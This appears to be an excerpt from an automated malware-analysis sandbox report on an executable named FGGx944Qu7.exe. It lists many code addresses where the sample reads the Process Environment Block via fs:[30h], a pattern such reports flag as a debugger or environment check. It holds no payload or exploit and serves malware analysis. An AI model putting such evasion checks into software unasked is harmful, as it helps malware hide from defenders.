Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	8_2_015FA2C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	8_2_015FA2C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	8_2_015FA2C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	8_2_015FA2C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA2C3 mov eax, dword ptr fs:[00000030h]	8_2_015FA2C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002A0 mov eax, dword ptr fs:[00000030h]	8_2_016002A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016002A0 mov eax, dword ptr fs:[00000030h]	8_2_016002A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]	8_2_016862A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov ecx, dword ptr fs:[00000030h]	8_2_016862A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]	8_2_016862A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]	8_2_016862A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]	8_2_016862A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016862A0 mov eax, dword ptr fs:[00000030h]	8_2_016862A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670283 mov eax, dword ptr fs:[00000030h]	8_2_01670283
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670283 mov eax, dword ptr fs:[00000030h]	8_2_01670283
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670283 mov eax, dword ptr fs:[00000030h]	8_2_01670283
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E284 mov eax, dword ptr fs:[00000030h]	8_2_0162E284
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E284 mov eax, dword ptr fs:[00000030h]	8_2_0162E284
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162656A mov eax, dword ptr fs:[00000030h]	8_2_0162656A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162656A mov eax, dword ptr fs:[00000030h]	8_2_0162656A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162656A mov eax, dword ptr fs:[00000030h]	8_2_0162656A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8550 mov eax, dword ptr fs:[00000030h]	8_2_015F8550
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8550 mov eax, dword ptr fs:[00000030h]	8_2_015F8550
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535 mov eax, dword ptr fs:[00000030h]	8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]	8_2_0161E53E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]	8_2_0161E53E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]	8_2_0161E53E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]	8_2_0161E53E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E53E mov eax, dword ptr fs:[00000030h]	8_2_0161E53E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686500 mov eax, dword ptr fs:[00000030h]	8_2_01686500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4500 mov eax, dword ptr fs:[00000030h]	8_2_016C4500
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E5E7 mov eax, dword ptr fs:[00000030h]	8_2_0161E5E7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F65D0 mov eax, dword ptr fs:[00000030h]	8_2_015F65D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C5ED mov eax, dword ptr fs:[00000030h]	8_2_0162C5ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C5ED mov eax, dword ptr fs:[00000030h]	8_2_0162C5ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E5CF mov eax, dword ptr fs:[00000030h]	8_2_0162E5CF
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E5CF mov eax, dword ptr fs:[00000030h]	8_2_0162E5CF
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A5D0 mov eax, dword ptr fs:[00000030h]	8_2_0162A5D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A5D0 mov eax, dword ptr fs:[00000030h]	8_2_0162A5D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F25E0 mov eax, dword ptr fs:[00000030h]	8_2_015F25E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016705A7 mov eax, dword ptr fs:[00000030h]	8_2_016705A7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016705A7 mov eax, dword ptr fs:[00000030h]	8_2_016705A7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016705A7 mov eax, dword ptr fs:[00000030h]	8_2_016705A7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016145B1 mov eax, dword ptr fs:[00000030h]	8_2_016145B1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016145B1 mov eax, dword ptr fs:[00000030h]	8_2_016145B1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2582 mov eax, dword ptr fs:[00000030h]	8_2_015F2582
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2582 mov ecx, dword ptr fs:[00000030h]	8_2_015F2582
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624588 mov eax, dword ptr fs:[00000030h]	8_2_01624588
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E59C mov eax, dword ptr fs:[00000030h]	8_2_0162E59C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E645D mov eax, dword ptr fs:[00000030h]	8_2_015E645D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C460 mov ecx, dword ptr fs:[00000030h]	8_2_0167C460
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161A470 mov eax, dword ptr fs:[00000030h]	8_2_0161A470
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161A470 mov eax, dword ptr fs:[00000030h]	8_2_0161A470
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161A470 mov eax, dword ptr fs:[00000030h]	8_2_0161A470
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E443 mov eax, dword ptr fs:[00000030h]	8_2_0162E443
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161245A mov eax, dword ptr fs:[00000030h]	8_2_0161245A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA456 mov eax, dword ptr fs:[00000030h]	8_2_016AA456
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01676420 mov eax, dword ptr fs:[00000030h]	8_2_01676420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628402 mov eax, dword ptr fs:[00000030h]	8_2_01628402
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628402 mov eax, dword ptr fs:[00000030h]	8_2_01628402
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628402 mov eax, dword ptr fs:[00000030h]	8_2_01628402
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EC427 mov eax, dword ptr fs:[00000030h]	8_2_015EC427
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE420 mov eax, dword ptr fs:[00000030h]	8_2_015EE420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE420 mov eax, dword ptr fs:[00000030h]	8_2_015EE420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EE420 mov eax, dword ptr fs:[00000030h]	8_2_015EE420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F04E5 mov ecx, dword ptr fs:[00000030h]	8_2_015F04E5
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016244B0 mov ecx, dword ptr fs:[00000030h]	8_2_016244B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167A4B0 mov eax, dword ptr fs:[00000030h]	8_2_0167A4B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AA49A mov eax, dword ptr fs:[00000030h]	8_2_016AA49A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F64AB mov eax, dword ptr fs:[00000030h]	8_2_015F64AB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0750 mov eax, dword ptr fs:[00000030h]	8_2_015F0750
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770 mov eax, dword ptr fs:[00000030h]	8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8770 mov eax, dword ptr fs:[00000030h]	8_2_015F8770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162674D mov esi, dword ptr fs:[00000030h]	8_2_0162674D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162674D mov eax, dword ptr fs:[00000030h]	8_2_0162674D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162674D mov eax, dword ptr fs:[00000030h]	8_2_0162674D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01674755 mov eax, dword ptr fs:[00000030h]	8_2_01674755
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632750 mov eax, dword ptr fs:[00000030h]	8_2_01632750
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632750 mov eax, dword ptr fs:[00000030h]	8_2_01632750
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E75D mov eax, dword ptr fs:[00000030h]	8_2_0167E75D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C720 mov eax, dword ptr fs:[00000030h]	8_2_0162C720
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C720 mov eax, dword ptr fs:[00000030h]	8_2_0162C720
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0710 mov eax, dword ptr fs:[00000030h]	8_2_015F0710
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166C730 mov eax, dword ptr fs:[00000030h]	8_2_0166C730
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162273C mov eax, dword ptr fs:[00000030h]	8_2_0162273C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162273C mov ecx, dword ptr fs:[00000030h]	8_2_0162273C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162273C mov eax, dword ptr fs:[00000030h]	8_2_0162273C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C700 mov eax, dword ptr fs:[00000030h]	8_2_0162C700
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620710 mov eax, dword ptr fs:[00000030h]	8_2_01620710
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E7E1 mov eax, dword ptr fs:[00000030h]	8_2_0167E7E1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016127ED mov eax, dword ptr fs:[00000030h]	8_2_016127ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016127ED mov eax, dword ptr fs:[00000030h]	8_2_016127ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016127ED mov eax, dword ptr fs:[00000030h]	8_2_016127ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FC7C0 mov eax, dword ptr fs:[00000030h]	8_2_015FC7C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F47FB mov eax, dword ptr fs:[00000030h]	8_2_015F47FB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F47FB mov eax, dword ptr fs:[00000030h]	8_2_015F47FB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016707C3 mov eax, dword ptr fs:[00000030h]	8_2_016707C3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A47A0 mov eax, dword ptr fs:[00000030h]	8_2_016A47A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169678E mov eax, dword ptr fs:[00000030h]	8_2_0169678E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F07AF mov eax, dword ptr fs:[00000030h]	8_2_015F07AF
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A660 mov eax, dword ptr fs:[00000030h]	8_2_0162A660
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A660 mov eax, dword ptr fs:[00000030h]	8_2_0162A660
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B866E mov eax, dword ptr fs:[00000030h]	8_2_016B866E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B866E mov eax, dword ptr fs:[00000030h]	8_2_016B866E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01622674 mov eax, dword ptr fs:[00000030h]	8_2_01622674
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160C640 mov eax, dword ptr fs:[00000030h]	8_2_0160C640
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01626620 mov eax, dword ptr fs:[00000030h]	8_2_01626620
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628620 mov eax, dword ptr fs:[00000030h]	8_2_01628620
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E627 mov eax, dword ptr fs:[00000030h]	8_2_0160E627
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]	8_2_0160260B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E609 mov eax, dword ptr fs:[00000030h]	8_2_0166E609
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F262C mov eax, dword ptr fs:[00000030h]	8_2_015F262C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632619 mov eax, dword ptr fs:[00000030h]	8_2_01632619
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0166E6F2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0166E6F2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0166E6F2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]	8_2_0166E6F2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016706F1 mov eax, dword ptr fs:[00000030h]	8_2_016706F1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016706F1 mov eax, dword ptr fs:[00000030h]	8_2_016706F1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A6C7 mov ebx, dword ptr fs:[00000030h]	8_2_0162A6C7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A6C7 mov eax, dword ptr fs:[00000030h]	8_2_0162A6C7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C6A6 mov eax, dword ptr fs:[00000030h]	8_2_0162C6A6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4690 mov eax, dword ptr fs:[00000030h]	8_2_015F4690
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4690 mov eax, dword ptr fs:[00000030h]	8_2_015F4690
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016266B0 mov eax, dword ptr fs:[00000030h]	8_2_016266B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962 mov eax, dword ptr fs:[00000030h]	8_2_01616962
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962 mov eax, dword ptr fs:[00000030h]	8_2_01616962
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962 mov eax, dword ptr fs:[00000030h]	8_2_01616962
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163096E mov eax, dword ptr fs:[00000030h]	8_2_0163096E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163096E mov edx, dword ptr fs:[00000030h]	8_2_0163096E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163096E mov eax, dword ptr fs:[00000030h]	8_2_0163096E
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694978 mov eax, dword ptr fs:[00000030h]	8_2_01694978
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694978 mov eax, dword ptr fs:[00000030h]	8_2_01694978
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C97C mov eax, dword ptr fs:[00000030h]	8_2_0167C97C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670946 mov eax, dword ptr fs:[00000030h]	8_2_01670946
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0168892B mov eax, dword ptr fs:[00000030h]	8_2_0168892B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8918 mov eax, dword ptr fs:[00000030h]	8_2_015E8918
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8918 mov eax, dword ptr fs:[00000030h]	8_2_015E8918
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167892A mov eax, dword ptr fs:[00000030h]	8_2_0167892A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E908 mov eax, dword ptr fs:[00000030h]	8_2_0166E908
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E908 mov eax, dword ptr fs:[00000030h]	8_2_0166E908
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C912 mov eax, dword ptr fs:[00000030h]	8_2_0167C912
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E9E0 mov eax, dword ptr fs:[00000030h]	8_2_0167E9E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	8_2_015FA9D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	8_2_015FA9D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	8_2_015FA9D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	8_2_015FA9D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	8_2_015FA9D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]	8_2_015FA9D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016229F9 mov eax, dword ptr fs:[00000030h]	8_2_016229F9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016229F9 mov eax, dword ptr fs:[00000030h]	8_2_016229F9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016869C0 mov eax, dword ptr fs:[00000030h]	8_2_016869C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016249D0 mov eax, dword ptr fs:[00000030h]	8_2_016249D0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA9D3 mov eax, dword ptr fs:[00000030h]	8_2_016BA9D3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]	8_2_016029A0
